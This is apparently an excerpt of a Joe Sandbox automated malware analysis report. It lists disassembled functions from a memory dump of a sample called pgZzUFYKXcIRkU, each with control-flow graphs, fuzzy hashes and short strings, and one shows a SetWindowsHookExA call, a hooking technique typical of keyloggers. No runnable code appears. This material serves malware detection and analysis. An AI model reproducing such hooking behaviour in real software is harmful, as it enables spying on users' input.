                                                          • Opcode Fuzzy Hash: 5083923d39086bbf0388808567be1a5fa2c3a3a4ffe9aa2933d754fd9a1ee955
                                                          • Instruction Fuzzy Hash: F2913670E002099FDF14CFA9C885BADBBF2AF98314F14C52DE425AB294EB74D945CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1555 1ce3bd-1ce3eb 1556 1ce3ed-1ce3f0 1555->1556 1557 1ce3f2-1ce40e 1556->1557 1558 1ce413-1ce415 1556->1558 1557->1558 1559 1ce41c-1ce41f 1558->1559 1560 1ce417 1558->1560 1559->1556 1562 1ce421-1ce447 1559->1562 1560->1559 1567 1ce44e-1ce47c 1562->1567 1572 1ce47e-1ce488 1567->1572 1573 1ce4f3-1ce517 1567->1573 1577 1ce48a-1ce490 1572->1577 1578 1ce4a0-1ce4f1 1572->1578 1579 1ce519 1573->1579 1580 1ce521 1573->1580 1581 1ce494-1ce496 1577->1581 1582 1ce492 1577->1582 1578->1572 1578->1573 1579->1580 1581->1578 1582->1578
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.625732464.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_1c0000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %$PHp
                                                          • API String ID: 0-3392928801
                                                          • Opcode ID: 042c5de6120c5e54d9a18138cdebddac5cc8cc59f0acd508932bc4bf44da525a
                                                          • Instruction ID: 2f93ecf6126d0c653fe1418ad0c26086fbf9cbf77e10f2a6b2653faee03c5424
                                                          • Opcode Fuzzy Hash: 042c5de6120c5e54d9a18138cdebddac5cc8cc59f0acd508932bc4bf44da525a
                                                          • Instruction Fuzzy Hash: AD410E30B002418FCB1AAB34D859B6E3BE3AF99354B64882CE002DB395EF35CD06C791
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2291 1c6590-1c65cf 2295 1c65d1-1c65d4 2291->2295 2296 1c65d6-1c65fc 2295->2296 2297 1c6601-1c6604 2295->2297 2296->2297 2298 1c6606-1c662c 2297->2298 2299 1c6631-1c6634 2297->2299 2298->2299 2300 1c6636-1c665c 2299->2300 2301 1c6661-1c6664 2299->2301 2300->2301 2303 1c6666 2301->2303 2304 1c6671-1c6674 2301->2304 2310 1c666c 2303->2310 2306 1c6676-1c669c 2304->2306 2307 1c66a1-1c66a4 2304->2307 2306->2307 2312 1c66a6-1c66cc 2307->2312 2313 1c66d1-1c66d4 2307->2313 2310->2304 2312->2313 2315 1c66d6-1c66ec 2313->2315 2316 1c66f1-1c66f4 2313->2316 2315->2316 2321 1c66f6-1c671c 2316->2321 2322 1c6721-1c6724 2316->2322 2321->2322 2324 1c6726-1c674c 2322->2324 2325 1c6751-1c6754 2322->2325 2324->2325 2329 1c6756-1c677c 2325->2329 2330 1c6781-1c6784 2325->2330 2329->2330 2332 1c6795-1c6798 2330->2332 2333 1c6786-1c6788 2330->2333 2339 1c679a-1c67c0 2332->2339 2340 1c67c5-1c67c8 2332->2340 2508 1c678a call 1c7e10 2333->2508 2509 1c678a call 1c7e01 2333->2509 2510 1c678a call 1c7eb3 2333->2510 2339->2340 2342 1c67ca-1c67f0 2340->2342 2343 1c67f5-1c67f8 2340->2343 2342->2343 2348 1c67fa-1c6820 2343->2348 2349 1c6825-1c6828 2343->2349 2344 1c6790 2344->2332 2348->2349 2351 1c682a-1c6850 2349->2351 2352 1c6855-1c6858 2349->2352 2351->2352 2356 1c685a-1c6880 2352->2356 2357 1c6885-1c6888 2352->2357 2356->2357 2360 1c688a-1c68b0 2357->2360 2361 1c68b5-1c68b8 2357->2361 2360->2361 2364 1c68ba-1c68e0 2361->2364 2365 1c68e5-1c68e8 2361->2365 2364->2365 2369 1c68ea-1c6910 2365->2369 2370 1c6915-1c6918 2365->2370 2369->2370 2374 1c691a-1c6940 2370->2374 2375 1c6945-1c6948 2370->2375 2374->2375 2379 1c694a-1c6970 2375->2379 2380 1c6975-1c6978 2375->2380 2379->2380 2384 1c697a-1c69a0 2380->2384 2385 1c69a5-1c69a8 2380->2385 2384->2385 2389 1c69aa-1c69d0 2385->2389 2390 1c69d5-1c69d8 2385->2390 2389->2390 2394 1c69da-1c6a00 2390->2394 2395 1c6a05-1c6a08 2390->2395 2394->2395 2399 1c6a0a-1c6a30 2395->2399 2400 1c6a35-1c6a38 2395->2400 2399->2400 2404 1c6a3a-1c6a60 2400->2404 2405 1c6a65-1c6a68 2400->2405 2404->2405 2409 1c6a6a-1c6a90 2405->2409 2410 1c6a95-1c6a98 2405->2410 2409->2410 2414 1c6a9a-1c6ac0 2410->2414 2415 1c6ac5-1c6ac8 2410->2415 2414->2415 2419 1c6aca-1c6af0 2415->2419 2420 1c6af5-1c6af8 2415->2420 2419->2420 2424 1c6afa-1c6b20 2420->2424 2425 1c6b25-1c6b28 2420->2425 2424->2425 2429 1c6b2a-1c6b50 2425->2429 2430 1c6b55-1c6b58 2425->2430 2429->2430 2434 1c6b5a-1c6b80 2430->2434 2435 1c6b85-1c6b88 2430->2435 2434->2435 2439 1c6b8a-1c6bb0 2435->2439 2440 1c6bb5-1c6bb8 2435->2440 2439->2440 2444 1c6bba-1c6be0 2440->2444 2445 1c6be5-1c6be8 2440->2445 2444->2445 2449 1c6bea-1c6c10 2445->2449 2450 1c6c15-1c6c18 2445->2450 2449->2450 2454 1c6c1a-1c6c40 2450->2454 2455 1c6c45-1c6c48 2450->2455 2454->2455 2459 1c6c4a-1c6c70 2455->2459 2460 1c6c75-1c6c78 2455->2460 2459->2460 2464 1c6c7a-1c6ca0 2460->2464 2465 1c6ca5-1c6ca8 2460->2465 2464->2465 2469 1c6caa-1c6cd0 2465->2469 2470 1c6cd5-1c6cd8 2465->2470 2469->2470 2474 1c6cda-1c6d00 2470->2474 2475 1c6d05-1c6d08 2470->2475 2474->2475 2479 1c6d0a-1c6d30 2475->2479 2480 1c6d35-1c6d38 2475->2480 2479->2480 2484 1c6d3a-1c6d4e 2480->2484 2485 1c6d53-1c6d56 2480->2485 2484->2485 2492 1c6d58-1c6d7e 2485->2492 2493 1c6d83-1c6d85 2485->2493 2492->2493 2494 1c6d8c-1c6d8f 2493->2494 2495 1c6d87 2493->2495 2494->2295 2502 1c6d95-1c6d9b 2494->2502 2495->2494 2508->2344 2509->2344 2510->2344
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.625732464.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_1c0000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0L
                                                          • API String ID: 0-1588582835
                                                          • Opcode ID: 3ae2dd185dd0560502bcc0b50343e74ff97ad7192778be7224ec479214a7aa43
                                                          • Instruction ID: bac63bd48d94000415cd505205252bf092f830894cd9469b871efba897fddf0a
                                                          • Opcode Fuzzy Hash: 3ae2dd185dd0560502bcc0b50343e74ff97ad7192778be7224ec479214a7aa43
                                                          • Instruction Fuzzy Hash: 96221774700306DBCB16AB28E855B2D36A2FB95344B60893DF00ADB355DF35EC8A8BC5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2511 4b9ff8-4ba042 2513 4ba04e-4ba080 SetWindowsHookExA 2511->2513 2514 4ba044-4ba04c 2511->2514 2515 4ba089-4ba0a9 2513->2515 2516 4ba082-4ba088 2513->2516 2514->2513 2516->2515
                                                          APIs
                                                          • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 004BA073
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.626048954.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_4b0000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID: HookWindows
                                                          • String ID:
                                                          • API String ID: 2559412058-0
                                                          • Opcode ID: 7221c69bd7ed1f6ce23f2dce5db43412879f27871ad6f5808383dd10a6608597
                                                          • Instruction ID: f14f0ffecceb102268db8af7da217be7ae3f650679d01763a74517fc1512bab7
                                                          • Opcode Fuzzy Hash: 7221c69bd7ed1f6ce23f2dce5db43412879f27871ad6f5808383dd10a6608597
                                                          • Instruction Fuzzy Hash: 7A21F4B5D002099FCB14DF9AD844BEEFBF5FB88310F14842AD419A7250C779A944CFA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2520 1c5088-1c50a0 2521 1c50a2-1c50a5 2520->2521 2522 1c50b4-1c50b7 2521->2522 2523 1c50a7-1c50ad 2521->2523 2524 1c50ee-1c50f1 2522->2524 2525 1c50b9-1c50c0 2522->2525 2523->2525 2526 1c50af 2523->2526 2524->2523 2529 1c50f3-1c50f6 2524->2529 2527 1c50c7-1c50e7 2525->2527 2528 1c50c2-1c50c6 2525->2528 2526->2522 2530 1c512c-1c512f 2527->2530 2531 1c50e9 2527->2531 2528->2527 2532 1c511d-1c5120 2529->2532 2533 1c50f8-1c5118 2529->2533 2534 1c51fa-1c5224 2530->2534 2535 1c5135-1c515b 2530->2535 2531->2524 2536 1c5127-1c512a 2532->2536 2537 1c5122-1c5124 2532->2537 2533->2532 2544 1c5226-1c5228 2534->2544 2538 1c5160-1c5163 2535->2538 2536->2530 2536->2538 2537->2536 2542 1c517a-1c517d 2538->2542 2543 1c5165-1c5175 2538->2543 2546 1c517f-1c5180 2542->2546 2547 1c5185-1c5188 2542->2547 2543->2542 2551 1c522f-1c5232 2544->2551 2552 1c522a 2544->2552 2546->2547 2548 1c518a-1c519e 2547->2548 2549 1c51bb-1c51bd 2547->2549 2561 1c51a4 2548->2561 2562 1c51a0-1c51a2 2548->2562 2554 1c51bf 2549->2554 2555 1c51c4-1c51c7 2549->2555 2551->2544 2556 1c5234-1c5241 2551->2556 2552->2551 2554->2555 2555->2521 2560 1c51cd-1c51eb 2555->2560 2566 1c5259-1c52cf call 1c4acc call 1c4adc call 1c4aec 2556->2566 2567 1c5243-1c5249 2556->2567 2576 1c51f2-1c51f9 2560->2576 2564 1c51a7-1c51b6 2561->2564 2562->2564 2564->2549 2586 1c52d1-1c52da 2566->2586 2587 1c52f2 2566->2587 2568 1c524d-1c524f 2567->2568 2569 1c524b 2567->2569 2568->2566 2569->2566 2588 1c52dc-1c52df 2586->2588 2589 1c52e1-1c52ee 2586->2589 2590 1c52f5-1c530c 2587->2590 2591 1c52f0 2588->2591 2589->2591 2595 1c530e-1c5336 call 1c0b34 2590->2595 2596 1c5366-1c539b 2590->2596 2591->2590 2605 1c533c-1c5358 2595->2605 2598 1c539d 2596->2598 2599 1c53a6 2596->2599 2598->2599 2601 1c53a7 2599->2601 2601->2601 2607 1c535a 2605->2607 2608 1c5363 2605->2608 2607->2608 2608->2596
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.625732464.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_1c0000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LRp
                                                          • API String ID: 0-3405495957
                                                          • Opcode ID: 7c8d1eea37d7a7e06d027594ad6c5f4691b67e40c7389a7f589ee5678d9397b5
                                                          • Instruction ID: 72dbf4feb9d9a934bf2d8774b7c89e7cb5e613a8de9690c37f8055f4bb4f1c9c
                                                          • Opcode Fuzzy Hash: 7c8d1eea37d7a7e06d027594ad6c5f4691b67e40c7389a7f589ee5678d9397b5
                                                          • Instruction Fuzzy Hash: 26915934B10615CFCB14DB68D898BAE7BB2BF98710F244569E406DB3A1DB75EC81CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2648 1c5bf7-1c5bfc 2649 1c5c5c 2648->2649 2650 1c5bfe-1c5c3c 2648->2650 2651 1c5c60-1c5c6f 2649->2651 2663 1c5c3e-1c5c41 2650->2663 2654 1c5c74-1c5c77 2651->2654 2656 1c5c79-1c5c80 2654->2656 2657 1c5c8b-1c5c8e 2654->2657 2658 1c5d9b-1c5da1 2656->2658 2659 1c5c86 2656->2659 2660 1c5c9e-1c5ca1 2657->2660 2661 1c5c90 call 1c6590 2657->2661 2659->2657 2664 1c5cdd-1c5cdf 2660->2664 2665 1c5ca3-1c5cd8 2660->2665 2666 1c5c96-1c5c99 2661->2666 2663->2654 2667 1c5c43-1c5c57 2663->2667 2668 1c5ce6-1c5ce9 2664->2668 2669 1c5ce1 2664->2669 2665->2664 2666->2660 2673 1c5c5d 2667->2673 2674 1c5c59-1c5c5b 2667->2674 2668->2663 2670 1c5cef-1c5cfe 2668->2670 2669->2668 2675 1c5d28-1c5d3e 2670->2675 2676 1c5d00-1c5d26 2670->2676 2673->2651 2674->2651 2675->2658 2676->2675
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.625732464.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_1c0000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LRp
                                                          • API String ID: 0-3405495957
                                                          • Opcode ID: fc8b8457c8ecf5705fa498d930c088724de369422ead5a0e97befe0028f0e94e
                                                          • Instruction ID: ff001d4a0788bc5a106e41d147a3c98c849d77b62b8be2aac65699341ecb977b
                                                          • Opcode Fuzzy Hash: fc8b8457c8ecf5705fa498d930c088724de369422ead5a0e97befe0028f0e94e
                                                          • Instruction Fuzzy Hash: FB41B170E00B098BDB15CFA4D894BAEB7B2EF65304F65446AE406EB251EB70EC85CB54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2683 1c5c28-1c5c3c 2684 1c5c3e-1c5c41 2683->2684 2685 1c5c74-1c5c77 2684->2685 2686 1c5c43-1c5c57 2684->2686 2687 1c5c79-1c5c80 2685->2687 2688 1c5c8b-1c5c8e 2685->2688 2696 1c5c5d 2686->2696 2697 1c5c59-1c5c5b 2686->2697 2689 1c5d9b-1c5da1 2687->2689 2690 1c5c86 2687->2690 2691 1c5c9e-1c5ca1 2688->2691 2692 1c5c90 call 1c6590 2688->2692 2690->2688 2694 1c5cdd-1c5cdf 2691->2694 2695 1c5ca3-1c5cd8 2691->2695 2698 1c5c96-1c5c99 2692->2698 2700 1c5ce6-1c5ce9 2694->2700 2701 1c5ce1 2694->2701 2695->2694 2699 1c5c60-1c5c6f 2696->2699 2697->2699 2698->2691 2699->2685 2700->2684 2702 1c5cef-1c5cfe 2700->2702 2701->2700 2705 1c5d28-1c5d3e 2702->2705 2706 1c5d00-1c5d26 2702->2706 2705->2689 2706->2705
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.625732464.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_1c0000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LRp
                                                          • API String ID: 0-3405495957
                                                          • Opcode ID: 2ecfbd4fad8df764d8b6b575f0f8bd8c3a6ef3d2eee9302044a165289ed4af0c
                                                          • Instruction ID: 2e04bd47651062677af2f9b978b968eb6fc59e6dafb59021d34fa721299c8efb
                                                          • Opcode Fuzzy Hash: 2ecfbd4fad8df764d8b6b575f0f8bd8c3a6ef3d2eee9302044a165289ed4af0c
                                                          • Instruction Fuzzy Hash: C1317070E00709DBDB14CFA5D484BAEB7B6EF95310F208529E806EB240EB71ED81CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 3136 1c8028-1c8047 3137 1c8049-1c804c 3136->3137 3138 1c804e-1c8053 3137->3138 3139 1c8056-1c8059 3137->3139 3138->3139 3140 1c835e-1c8367 3139->3140 3141 1c805f-1c8062 3139->3141 3144 1c836d-1c8377 3140->3144 3145 1c80d8-1c80e1 3140->3145 3142 1c8064-1c8080 3141->3142 3143 1c8085-1c8088 3141->3143 3142->3143 3148 1c80bd-1c80c0 3143->3148 3149 1c808a-1c80b8 3143->3149 3146 1c837a-1c83aa 3145->3146 3147 1c80e7-1c80ee 3145->3147 3161 1c83ac-1c83af 3146->3161 3151 1c80f3-1c80f6 3147->3151 3152 1c80c2 3148->3152 3153 1c80d3-1c80d6 3148->3153 3149->3148 3154 1c80f8-1c8107 3151->3154 3155 1c8112-1c8114 3151->3155 3273 1c80c5 call 1c833e 3152->3273 3274 1c80c5 call 1c8028 3152->3274 3275 1c80c5 call 1c8388 3152->3275 3276 1c80c5 call 1c8140 3152->3276 3277 1c80c5 call 1c8390 3152->3277 3153->3145 3153->3151 3168 1c810d 3154->3168 3169 1c835b 3154->3169 3159 1c811b-1c811e 3155->3159 3160 1c8116 3155->3160 3159->3137 3164 1c8124-1c814c call 1c8960 3159->3164 3160->3159 3166 1c8534-1c853e 3161->3166 3167 1c83b5-1c83b8 3161->3167 3162 1c80cb-1c80ce 3162->3153 3278 1c814f call 1cbe88 3164->3278 3279 1c814f call 1cbf50 3164->3279 3170 1c83ba-1c83c8 3167->3170 3171 1c83d3-1c83d6 3167->3171 3168->3155 3169->3140 3182 1c83ce 3170->3182 3183 1c8489-1c84ab 3170->3183 3172 1c83e8-1c83eb 3171->3172 3173 1c83d8 3171->3173 3175 1c83ed-1c8405 3172->3175 3176 1c8410-1c8413 3172->3176 3178 1c83e0-1c83e3 3173->3178 3192 1c851a-1c851d 3175->3192 3193 1c840b 3175->3193 3179 1c8415-1c842e 3176->3179 3180 1c8433-1c8436 3176->3180 3178->3172 3179->3180 3184 1c8438-1c843b 3180->3184 3185 1c8457-1c8460 3180->3185 3182->3171 3188 1c843d-1c8440 3184->3188 3189 1c8445-1c8448 3184->3189 3190 1c846c-1c8475 3185->3190 3191 1c8462 3185->3191 3188->3189 3197 1c844a-1c844f 3189->3197 3198 1c8452-1c8455 3189->3198 3200 1c853f-1c8553 3190->3200 3201 1c847b-1c847f 3190->3201 3199 1c8467-1c846a 3191->3199 3202 1c8522-1c8524 3192->3202 3193->3176 3196 1c8155-1c8157 3196->3169 3203 1c815d-1c816b 3196->3203 3197->3198 3198->3185 3198->3199 3199->3190 3204 1c8484-1c8487 3199->3204 3201->3204 3205 1c852b-1c852e 3202->3205 3206 1c8526 3202->3206 3203->3169 3214 1c8171-1c81ce 3203->3214 3204->3183 3210 1c84ac-1c84af 3204->3210 3205->3161 3205->3166 3206->3205 3212 1c84ce-1c84d1 3210->3212 3213 1c84b1-1c84c9 3210->3213 3215 1c84f0-1c84f3 3212->3215 3216 1c84d3-1c84eb 3212->3216 3213->3212 3230 1c829f-1c82b9 3214->3230 3231 1c81d4-1c8227 3214->3231 3217 1c8515-1c8518 3215->3217 3218 1c84f5-1c8510 3215->3218 3216->3215 3217->3192 3217->3202 3218->3217 3236 1c82bb-1c82bf 3230->3236 3250 1c8229-1c8245 3231->3250 3251 1c8247-1c826a call 1c0d10 3231->3251 3238 1c82d0 3236->3238 3239 1c82c1-1c82ce 3236->3239 3240 1c82d5-1c82d7 3238->3240 3239->3240 3242 1c82d9-1c82db 3240->3242 3243 1c8343-1c8355 3240->3243 3244 1c82dd-1c82e7 3242->3244 3245 1c82e9 3242->3245 3243->3169 3243->3214 3246 1c82ee-1c82f0 3244->3246 3245->3246 3246->3243 3249 1c82f2-1c82f4 3246->3249 3249->3243 3252 1c82f6-1c833c 3249->3252 3262 1c826c-1c829d 3250->3262 3251->3262 3252->3243 3262->3236 3273->3162 3274->3162 3275->3162 3276->3162 3277->3162 3278->3196 3279->3196
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.625732464.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_1c0000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c5cefff338bb68efe1d48d18ddf68c99d9ff98cfb474a35b7022b8bea11c5ffb
                                                          • Instruction ID: 9b2ce32723dddc482b127afd51509434d901be1de99038e0212f9924b79d5ffc
                                                          • Opcode Fuzzy Hash: c5cefff338bb68efe1d48d18ddf68c99d9ff98cfb474a35b7022b8bea11c5ffb
                                                          • Instruction Fuzzy Hash: D3D15D34A002059FCB14DBA8D894FADBBB2EF99310F248469E806D73A5DF35ED45CB94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.625732464.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_1c0000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 25f3ab59d8d8dbb7402c21290dca2c2dd2d0669f12b0dd0bedd1fa053ec934ca
                                                          • Instruction ID: 2a16881264f401f63f7652662210ddfef4480fb64fae5b2704d5eb887531d7ba
                                                          • Opcode Fuzzy Hash: 25f3ab59d8d8dbb7402c21290dca2c2dd2d0669f12b0dd0bedd1fa053ec934ca
                                                          • Instruction Fuzzy Hash: 88817D71A002048FDB14DF68D894B9DBBB1FF98310F14C5AAE909AB396EB71DC45CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.625732464.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_1c0000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c7087993dc6db782151becfaf5a3759ce28e07339bce24f98aa13cea242db953
                                                          • Instruction ID: 7ac20edb520e3a5c9e4971e8d44ac6aeb8f42102c471e4017922bee87e790e57
                                                          • Opcode Fuzzy Hash: c7087993dc6db782151becfaf5a3759ce28e07339bce24f98aa13cea242db953
                                                          • Instruction Fuzzy Hash: 26715970E04259CFDB14CFA9C895BAEBBF2BF98314F24852DE414AB294DB74D845CB81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.625732464.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_1c0000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e1fdc2f1bbff64b6108af55c5bb3bc034b2acf9e22862631c642e07f602e7f1e
                                                          • Instruction ID: 8b7fb06f3b6e464e24c8bf440241547f8f45a8a73042c4d5406a5a4ae4581308
                                                          • Opcode Fuzzy Hash: e1fdc2f1bbff64b6108af55c5bb3bc034b2acf9e22862631c642e07f602e7f1e
                                                          • Instruction Fuzzy Hash: 8241B234B002068FDF259BA8D4D4B7EB7A6EBA5310F64886ED509DB341DF35DC868782
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.625732464.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_1c0000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2e1dd8fd6e9e4dd62c311a234b93901287865bfb32d01f85f143b7b7a750ffe6
                                                          • Instruction ID: 1aa0db15b6bd8ede59be977e9c435d71a88f2ae44ff586f238f156506453dd40
                                                          • Opcode Fuzzy Hash: 2e1dd8fd6e9e4dd62c311a234b93901287865bfb32d01f85f143b7b7a750ffe6
                                                          • Instruction Fuzzy Hash: 58318075B001068BDF25CFA9D8C0B7EB7A2FBA5310F64492ED509DB241CB75DC858791
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.625732464.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_1c0000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3609dc7f211ef8d25594f614ee08733e1f0fa9105fd73d03feb80cc6a48a4aa4
                                                          • Instruction ID: 9aeaee8c24f683059684d537956425ae0b894a729bce8dae5890f0f27d4bb8b7
                                                          • Opcode Fuzzy Hash: 3609dc7f211ef8d25594f614ee08733e1f0fa9105fd73d03feb80cc6a48a4aa4
                                                          • Instruction Fuzzy Hash: 46315A75E006459BCB19CBA4D894BAEB7F2BF99300F10852DE806AB351DB70EC42CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.625732464.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_1c0000_pgZzUFYKXcIRkU.jbxd